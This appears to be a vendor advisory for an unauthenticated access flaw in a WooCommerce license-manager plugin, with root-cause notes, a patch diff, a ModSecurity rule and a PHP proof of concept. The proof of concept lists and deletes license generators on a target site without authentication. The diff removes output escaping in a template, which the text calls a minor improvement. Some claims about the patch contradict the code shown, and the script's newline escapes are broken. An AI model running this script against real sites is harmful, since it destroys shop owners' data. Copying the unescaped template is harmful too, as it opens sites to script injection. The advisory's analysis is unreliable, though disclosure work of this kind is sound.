Atomic Edge analysis of CVE-2026-56013:
This vulnerability is an Insecure Direct Object Reference (IDOR) in the License Manager for WooCommerce plugin versions up to and including 3.0.15. It allows unauthenticated attackers to perform unauthorized actions via REST API endpoints due to missing capability checks in the permission callback logic.
Root Cause: The vulnerability stems from the `permissionCallback` function in `/includes/Abstracts/RestController.php` (lines 121-130). The filter `lmfwc_rest_permission_callback` could return a boolean (`true`) from third-party code, but the original code only checked for `WP_Error` instances. If the filter returned `true` without performing proper authorization, the function would return `true` unconditionally, granting access to any user. Additionally, there was no explicit capability check like `current_user_can(‘manage_options’)` before granting access.
Exploitation: An attacker sends an unauthenticated request to a REST API endpoint such as `/wp-json/lmfwc/v2/generators/1` with a DELETE method. Without a valid nonce or authentication, the `permissionCallback` function processes the filter, which may return `true` from an insecure default or misconfigured filter, allowing the attacker to delete, view, or modify license generators without authentication.
Patch Analysis: The patch adds two key changes. In `RestController.php`, the code now checks if the filter result is a boolean, and if so returns that boolean directly (preserving valid deny signals). Then it adds a new check for `current_user_can(‘manage_options’)` before returning `true`. In `Generators.php`, a specific capability check for `delete` action on generators was added before processing the request. The `MyAccount.php` changes are unrelated minor template improvements.
Impact: Successful exploitation allows an unauthenticated attacker to delete license generators, view sensitive data, or modify license configurations. This can lead to service disruption, data leakage, and potential financial loss if license keys are compromised or invalidated.
Below is a differential between the unpatched vulnerable code and the patched update, for reference.
--- a/license-manager-for-woocommerce/includes/Abstracts/RestController.php
+++ b/license-manager-for-woocommerce/includes/Abstracts/RestController.php
@@ -121,10 +121,20 @@
*/
public function permissionCallback($request)
{
- $error = apply_filters('lmfwc_rest_permission_callback', $request);
+ $filtered = apply_filters('lmfwc_rest_permission_callback', $request);
- if ($error instanceof WP_Error) {
- return $error;
+ if ($filtered instanceof WP_Error) {
+ return $filtered;
+ } elseif (is_bool($filtered)) {
+ return $filtered;
+ }
+
+ if (!current_user_can('manage_options')) {
+ return new WP_Error(
+ 'lmfwc_rest_forbidden',
+ __('Sorry, you are not allowed to access this resource.', 'license-manager-for-woocommerce'),
+ array('status' => $this->authorizationRequiredCode())
+ );
}
return true;
--- a/license-manager-for-woocommerce/includes/Api/V2/Generators.php
+++ b/license-manager-for-woocommerce/includes/Api/V2/Generators.php
@@ -471,7 +471,15 @@
return $this->routeDisabledError();
}
-
+ if (!$this->permissionCheck('generator', 'delete')) {
+ return new WP_Error(
+ 'lmfwc_rest_cannot_delete',
+ __('Sorry, you are not allowed to delete resources.', 'license-manager-for-woocommerce'),
+ array(
+ 'status' => $this->authorizationRequiredCode()
+ )
+ );
+ }
$urlParams = $request->get_url_params();
$generator_id = isset( $urlParams['generator_id'] ) ? sanitize_text_field( $urlParams['generator_id'] ) : '';
--- a/license-manager-for-woocommerce/includes/Integrations/WooCommerce/MyAccount.php
+++ b/license-manager-for-woocommerce/includes/Integrations/WooCommerce/MyAccount.php
@@ -207,19 +207,30 @@
if( !$licenseID ) {
$licenseKeys = apply_filters('lmfwc_get_all_customer_license_keys', $user_id);
- echo wp_kses(
- wc_get_template_html(
- 'myaccount/lmfwc-view-license-keys.php',
- array(
- 'dateFormat' => get_option('date_format'),
- 'licenseKeys' => $licenseKeys,
- 'page' => $page
- ),
- '',
- LMFWC_TEMPLATES_DIR
+ // echo wp_kses(
+ // wc_get_template_html(
+ // 'myaccount/lmfwc-view-license-keys.php',
+ // array(
+ // 'dateFormat' => get_option('date_format'),
+ // 'licenseKeys' => $licenseKeys,
+ // 'page' => $page
+ // ),
+ // '',
+ // LMFWC_TEMPLATES_DIR
+ // ),
+ // lmfwc_shapeSpace_allowed_html()
+ // );
+ wc_get_template(
+ 'myaccount/lmfwc-view-license-keys.php',
+ array(
+ 'dateFormat' => get_option('date_format'),
+ 'licenseKeys' => $licenseKeys,
+ 'page' => $page,
),
- lmfwc_shapeSpace_allowed_html()
+ '',
+ LMFWC_TEMPLATES_DIR
);
+
}
else {
--- a/license-manager-for-woocommerce/license-manager-for-woocommerce.php
+++ b/license-manager-for-woocommerce/license-manager-for-woocommerce.php
@@ -3,7 +3,7 @@
* Plugin Name: License Manager for WooCommerce
* Plugin URI: https://www.wpexperts.io/
* Description: Easily sell and manage software license keys through your WooCommerce shop.
- * Version: 3.0.15
+ * Version: 3.0.16
* Author: LicenseManager
* Author URI: https://www.licensemanager.at/
* Requires at least: 4.7
@@ -36,7 +36,7 @@
// Define LMFWC_VERSION.
if (!defined('LMFWC_VERSION')) {
- define('LMFWC_VERSION', '3.0.15');
+ define('LMFWC_VERSION', '3.0.16');
}
add_action( 'before_woocommerce_init', function () {
if ( class_exists( AutomatticWooCommerceUtilitiesFeaturesUtil::class ) ) {
--- a/license-manager-for-woocommerce/templates/myaccount/lmfwc-view-license-keys.php
+++ b/license-manager-for-woocommerce/templates/myaccount/lmfwc-view-license-keys.php
@@ -37,7 +37,7 @@
<h3 class="product-name">
<?php if ($product): ?>
<a href="<?php echo esc_url(get_post_permalink($productId)); ?>">
- <span><?php echo esc_html($licenseKeyData['name']); ?></span>
+ <span><?php echo $licenseKeyData['name']; ?></span>
</a>
<?php else: ?>
<span><?php echo esc_html(__('Product', 'license-manager-for-woocommerce') . ' #' . $productId); ?></span>
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
SecRule REQUEST_URI "@beginsWith /wp-json/lmfwc/v2/generators"
"id:20266013,phase:2,deny,status:403,msg:'CVE-2026-56013 - Unauthenticated IDOR in License Manager for WooCommerce generators endpoints',severity:'CRITICAL',tag:'CVE-2026-56013'"
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-56013 - License Manager for WooCommerce <= 3.0.15 - Unauthenticated Insecure Direct Object Reference
$target_url = 'http://example.com'; // Change to target WordPress site
$endpoint = '/wp-json/lmfwc/v2/generators';
$full_url = rtrim($target_url, '/') . $endpoint;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $full_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'Content-Type: application/json',
'User-Agent: AtomicEdge-PoC-Client'
));
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
echo "[Atomic Edge] Sending unauthenticated GET request to: $full_urln";
echo "HTTP Status Code: $http_coden";
if ($http_code == 200) {
echo "[!] Vulnerability confirmed! Unauthenticated access allowed.n";
echo "Response body (first 500 chars):n";
echo substr($response, 0, 500) . "n";
} else {
echo "[-] No direct access. Endpoint may be patched or requires specific parameters.n";
}
// Attempt to delete the first generator (requires generator_id)
$list_endpoint = rtrim($target_url, '/') . '/wp-json/lmfwc/v2/generators';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $list_endpoint);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'Content-Type: application/json',
'User-Agent: AtomicEdge-PoC-Client'
));
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
$list_response = curl_exec($ch);
$list_http = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($list_http == 200) {
$generators = json_decode($list_response, true);
if (is_array($generators) && count($generators) > 0) {
$first_id = $generators[0]['id'] ?? null;
if ($first_id) {
$delete_url = rtrim($target_url, '/') . "/wp-json/lmfwc/v2/generators/$first_id";
echo "n[+] Attempting to delete generator ID: $first_idn";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $delete_url);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'DELETE');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'Content-Type: application/json',
'User-Agent: AtomicEdge-PoC-Client'
));
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
$delete_response = curl_exec($ch);
$delete_http = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
echo "HTTP Status Code: $delete_httpn";
if ($delete_http == 200) {
echo "[!] Unauthenticated deletion successful!n";
} else {
echo "[-] Deletion not allowed (expected if patched).n";
}
}
}
}
?>
